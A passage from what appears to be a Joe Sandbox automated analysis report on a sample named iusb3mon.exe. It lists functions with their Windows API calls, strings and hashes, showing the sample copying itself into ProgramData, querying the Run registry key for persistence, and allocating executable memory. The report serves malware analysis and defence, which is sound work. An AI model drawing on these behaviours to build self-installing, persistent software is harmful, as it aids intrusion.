WaitForSingleObject.KERNEL32(?,000000FF), ref: 06298D60
CloseHandle.KERNEL32(?), ref: 06298D69

Strings

G&, xrefs: 06298D51

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Create$CloseErrorEventHandleLastObjectSingleThreadWait
String ID: G&
API String ID: 3117531959-2298792099
Opcode ID: 1090b04fd6e4f8036db452c6e59f830065175370ca674259c77c1fdef5424316
Instruction ID: 52fc88f5da2165d7b4ed53ca439cf282d240d5da891a60c0a8631b1cf2df102c
Opcode Fuzzy Hash: 1090b04fd6e4f8036db452c6e59f830065175370ca674259c77c1fdef5424316
Instruction Fuzzy Hash: 7FF0A9B290021ABFDF019FA4DD458EE7BB9FB48310B104565FE21E2250E7719E21AFA0

Function 06297AC4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,C:\ProgramData\Program\iusb3mon.exe,00000000,062C8518,06296098,C:\ProgramData\Microsoft\MicrosoftNetFramework.xml,0000000A), ref: 06297ADA
WriteFile.KERNEL32(00000000,062B8760,00000EE2,?,00000000), ref: 06297AF2
CloseHandle.KERNEL32(00000000), ref: 06297AFF

Strings

C:\ProgramData\Program\iusb3mon.exe, xrefs: 06297ACA

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleWrite
String ID: C:\ProgramData\Program\iusb3mon.exe
API String ID: 1065093856-3106534563
Opcode ID: bd7c1152355cc475c18653c04a825d9d6d75db0303de3bbbb5632e81e5636d19
Instruction ID: 66be8c24470b7bb7b1667c5b5aa378303e2ccc8ed78ad7d1672f5d035a81998b
Opcode Fuzzy Hash: bd7c1152355cc475c18653c04a825d9d6d75db0303de3bbbb5632e81e5636d19
Instruction Fuzzy Hash: A7E09A7628131CBFFA201E60ACCAFEB3A0EEB057D8F004121FF04A9140C6D19D019AB0

Function 062ACD41 Relevance: 6.1, APIs: 4, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersion.KERNEL32(?,?,?,062ACD3C), ref: 062ACDB8
GetProcessVersion.KERNEL32(00000000,?,?,?,062ACD3C), ref: 062ACDF5
LoadCursorA.USER32(00000000,00007F02), ref: 062ACE23
LoadCursorA.USER32(00000000,00007F00), ref: 062ACE2E

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: CursorLoadVersion$Process
String ID:
API String ID: 2246821583-0
Opcode ID: 6c7bd18395a63cd53dde57716b702eed0d8b07a8ad5ddbf8e792ff4b832d75ad
Instruction ID: 815da3c178008ec66ed9c5aa58a15bbc9f93c8631ed8cf375e7f6c7b8ccd257c
Opcode Fuzzy Hash: 6c7bd18395a63cd53dde57716b702eed0d8b07a8ad5ddbf8e792ff4b832d75ad
Instruction Fuzzy Hash: 6E113DB1A50B508FD7649F3A989452ABBE5FB487057414D3ED5C7C6B40D7B4E401CF50

Function 00345B68 Relevance: 6.1, APIs: 4, Instructions: 53
timethreadCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___std_exception_copy.LIBVCRUNTIME ref: 0034121E

Part of subcall function 00346F34: RaiseException.KERNEL32(E06D7363,00000001,00000003,003411FC,?,?,?,?,003411FC,?,0036A814), ref: 00346F94

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00346571
GetCurrentThreadId.KERNEL32 ref: 00346580
GetCurrentProcessId.KERNEL32 ref: 00346589
QueryPerformanceCounter.KERNEL32(?), ref: 00346596

Memory Dump Source

Source File: 0000001E.00000002.4665809368.0000000000341000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00340000, based on PE: true

Associated: 0000001E.00000002.4665515553.0000000000340000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666146444.000000000035E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666408946.000000000036C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666641264.000000000036E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666973971.00000000003A2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667717172.00000000003A3000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.00000000003AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.00000000003D1000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.00000000003D3000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000419000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000041B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000041D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000041F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000421000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000423000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000425000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000042F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000441000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000443000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000445000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000447000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000449000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000044B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000044D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000044F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000451000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000045F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000462000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000467000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000469000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000046B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000046D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000046F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000471000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000473000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000497000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000049C000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4678100485.000000000072F000.00000020.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_340000_iusb3mon.jbxd

Similarity

API ID: CurrentTime$CounterExceptionFilePerformanceProcessQueryRaiseSystemThread___std_exception_copy
String ID:
API String ID: 3658488982-0
Opcode ID: 850ef7d98574ee66eed48d4629ffc6e2724af24e7851455d235f011869219133
Instruction ID: 4de8b4f9604df5e41beba798d01909cc093394a4fb3183a691af109be00f59fe
Opcode Fuzzy Hash: 850ef7d98574ee66eed48d4629ffc6e2724af24e7851455d235f011869219133
Instruction Fuzzy Hash: 55112A35C0020DEBCF06EBB5D849A9EB7F8EF08311F9045A5E415EB0A1EB70EB45CA91

Function 0629B408 Relevance: 4.6, APIs: 3, Instructions: 57threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 0629B434
TlsSetValue.KERNEL32(?), ref: 0629B462
GetCurrentThreadId.KERNEL32 ref: 0629B474

Part of subcall function 0629CE08: TlsGetValue.KERNEL32(00000031,?,0629B69E,00000000,0629B6E5,?,?,?), ref: 0629CE20
Part of subcall function 0629CE08: TlsSetValue.KERNEL32(00000000,?,0629B69E,00000000,0629B6E5,?,?,?), ref: 0629CEA0

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Value$CurrentThread
String ID:
API String ID: 1393879374-0
Opcode ID: a8444f3ad881ed77390dcd23275580c74ac55b9778daa93168f2bfde951c340a
Instruction ID: b708475f51d28dd808a82fcd104cd2b04336ec4fda8cdaaf764ff39600b92e57
Opcode Fuzzy Hash: a8444f3ad881ed77390dcd23275580c74ac55b9778daa93168f2bfde951c340a
Instruction Fuzzy Hash: CA11E232A20714EFCB609F68EC49B9ABBB5FF40761F104929EE5293290D7719800DFA0

Function 06291F38 Relevance: 4.5, APIs: 3, Instructions: 39registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?,?,?,?,062962A3,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,Microsoft), ref: 06291F56
RegQueryValueExA.KERNEL32(?,?,00000000,00000001,00000000,00000000,?,?,?,?,062962A3,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,Microsoft), ref: 06291F72
RegCloseKey.ADVAPI32(?,?,?,?,?,062962A3,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,Microsoft), ref: 06291F7D

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 03f5b39a5e5be9e0f90ab7ea959f3073d4656e8eaf94ec2a819e613a612b3d34
Instruction ID: c4f0dae0f06f31e4e28383127e62e37e4d689f9418805c1baece351c748c31fd
Opcode Fuzzy Hash: 03f5b39a5e5be9e0f90ab7ea959f3073d4656e8eaf94ec2a819e613a612b3d34
Instruction Fuzzy Hash: C6F0907291030DBFEF115E91DC88DEE7B6EEB04398F048421FE16A6010C7728D14AB70

Function 06297B7D Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 06297B82

Strings

C:\ProgramData\Program, xrefs: 06297B8B

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: H_prolog
String ID: C:\ProgramData\Program
API String ID: 3519838083-2177086111
Opcode ID: e78f6c273bcb352b4c4066fe7551ace0f6d943ecd55c3327b8ea056ce3a5fc1f
Instruction ID: 6e1f128c5f2c83c9822734984528a32a2383873730a7f3bdca92901884780af4
Opcode Fuzzy Hash: e78f6c273bcb352b4c4066fe7551ace0f6d943ecd55c3327b8ea056ce3a5fc1f
Instruction Fuzzy Hash: 4E413D30A302069FDF54CF58C990AADBBF0EF98324F2485A9E85597391D731DE40CBA1

Function 062501CB Relevance: 3.3, APIs: 2, Instructions: 267memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 0625022B

Memory Dump Source

Source File: 0000001E.00000002.4680057945.0000000006250000.00000040.00001000.00020000.00000000.sdmp, Offset: 06250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6250000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
Instruction ID: bd248f06863e6fdc355e09d42618e4ef08136d539dc6da2a5457fa63682fb657
Opcode Fuzzy Hash: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
Instruction Fuzzy Hash: C3A16A70E20606EFDB64CFA9CC80AAEB7B5FF48304B158469EC15DB651E770EA51CB90

Function 0629B39D Relevance: 3.0, APIs: 2, Instructions: 45threadCOMMON

Download Yara Rule

APIs

Part of subcall function 062A005D: HeapAlloc.KERNEL32(00000008,06298D56,00000000,00000000,00000000,00000000,00000000,?,06298D56,?,?,06298CE2,?,?,?), ref: 062A0153

CreateThread.KERNEL32(?,06298D56,0629B408,00000000,00000000,?), ref: 0629B3DE
GetLastError.KERNEL32(?,06298D56,?,?,06298CE2,?,?,?), ref: 0629B3E8

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AllocCreateErrorHeapLastThread
String ID:
API String ID: 3580101977-0
Opcode ID: e473b271a3c78fe714f01a1ffbe01318f16fa7094768235467c56151cf279a88
Instruction ID: bf4f07c970042f24aeeceff4087b85979b21a3114446fb9f21adb78c4cc698b4
Opcode Fuzzy Hash: e473b271a3c78fe714f01a1ffbe01318f16fa7094768235467c56151cf279a88
Instruction Fuzzy Hash: 31F0A9366157166BDF609F75BC04DAB3BA5DF81772B10811AFE2486580CB319412AFB1

Function 0629ED44 Relevance: 3.0, APIs: 2, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNEL32(00000000,00001000,00000000,0629B5EB,00000001), ref: 0629ED55

Part of subcall function 0629EBFC: GetVersionExA.KERNEL32 ref: 0629EC1B

HeapDestroy.KERNEL32 ref: 0629ED94

Part of subcall function 0629EE49: HeapAlloc.KERNEL32(00000000,00000140,0629ED7D,000003F8), ref: 0629EE56

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Heap$AllocCreateDestroyVersion
String ID:
API String ID: 2507506473-0
Opcode ID: 855609d4b781c907a0962e24ac484336c7bb012c6a9bbaaa7acedf76ac0abe0f
Instruction ID: 537ac152d9df458271e67edee632208443c455d765fceddf309d316f7f97e6bd
Opcode Fuzzy Hash: 855609d4b781c907a0962e24ac484336c7bb012c6a9bbaaa7acedf76ac0abe0f
Instruction Fuzzy Hash: C5F06574A713029EEFE09B31FC0C729399AAFC0651F124825EE95D42D4EBA481809A32

Function 0629A1C0 Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,062969AD,c:\inst.ini,00000000), ref: 0629A1C4
GetLastError.KERNEL32 ref: 0629A1CF

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AttributesErrorFileLast
String ID:
API String ID: 1799206407-0
Opcode ID: ccc62bee4e745ad771893171380cc51891f03e8c71398f2af594dec4057a5630
Instruction ID: 875bd8a8a552d326dec1848e24fadbae668a0254c31bfc35bad357fa6509a32e
Opcode Fuzzy Hash: ccc62bee4e745ad771893171380cc51891f03e8c71398f2af594dec4057a5630
Instruction Fuzzy Hash: B7E046308207024BDFD12F749C093197A915FD3765F264A45ECB5850E4CBB58441FA32

Function 0629ACDB Relevance: 1.6, APIs: 1, Instructions: 80memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,-0000000F,00000000,06298D56,00000000,00000000,00000000), ref: 0629ADC2

Part of subcall function 0629CFF4: InitializeCriticalSection.KERNEL32(00000000,00000000,06298D56,?,062A0113,00000009,00000000,00000000,00000000,00000000,00000000,?,06298D56,?,?,06298CE2), ref: 0629D031
Part of subcall function 0629CFF4: EnterCriticalSection.KERNEL32(06298D56,06298D56,?,062A0113,00000009,00000000,00000000,00000000,00000000,00000000,?,06298D56,?,?,06298CE2,?), ref: 0629D04C

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: CriticalSection$AllocateEnterHeapInitialize
String ID:
API String ID: 1616793339-0
Opcode ID: efb945db234ae1e329f3bc49c552158cf1ceb5dd718656d270aeda36f1bb1086
Instruction ID: da75cb8b588069f0276a80d643145f8ff8907b4040663c58b4bc6ed8b7456ff5
Opcode Fuzzy Hash: efb945db234ae1e329f3bc49c552158cf1ceb5dd718656d270aeda36f1bb1086
Instruction Fuzzy Hash: 0621B632A60305AFDFD0DB69EC45B9D7BA4EB81761F144215FD21EB3C0D7B499418AB0

Function 00350109 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,003423D4,00000000), ref: 0035013B

Memory Dump Source

Source File: 0000001E.00000002.4665809368.0000000000341000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00340000, based on PE: true

Associated: 0000001E.00000002.4665515553.0000000000340000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666146444.000000000035E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666408946.000000000036C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666641264.000000000036E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4666973971.00000000003A2000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667717172.00000000003A3000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.00000000003AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.00000000003D1000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.00000000003D3000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000419000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000041B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000041D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000041F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000421000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000423000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000425000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000042F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000441000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000443000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000445000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000447000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000449000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000044B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000044D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000044F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000451000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000045F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000462000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000467000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000469000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000046B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000046D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000046F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000471000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000473000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000497000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000049C000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4678100485.000000000072F000.00000020.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_340000_iusb3mon.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 55b3102515fe46b051d6140ad4f740f2d8c240acba8a9d63acff0ee3e71e97af
Instruction ID: 80f8aa10e09d51d3204adaa8b97b7b4e7383d440f58ee749c07b8089827ca7cf
Opcode Fuzzy Hash: 55b3102515fe46b051d6140ad4f740f2d8c240acba8a9d63acff0ee3e71e97af
Instruction Fuzzy Hash: 8EE09B3D241A15ABD63B36759D05F9A368C9F413A2F160121FC489E5B1DB72DE04C1E7

Function 06298CE2 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?), ref: 06298CFC

Part of subcall function 06298EF1: LoadLibraryA.KERNEL32(user32.dll,?,?,?,?,?,?,?,?,?,00000000,Function_0000ADE0,062AE518,000000FF,?,06298D0F), ref: 06298F19
Part of subcall function 06298EF1: GetProcAddress.KERNEL32(?,OpenInputDesktop), ref: 06298F74
Part of subcall function 06298EF1: GetProcAddress.KERNEL32(?,OpenDesktopA), ref: 06298F81
Part of subcall function 06298EF1: GetProcAddress.KERNEL32(?,CloseDesktop), ref: 06298F8D

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
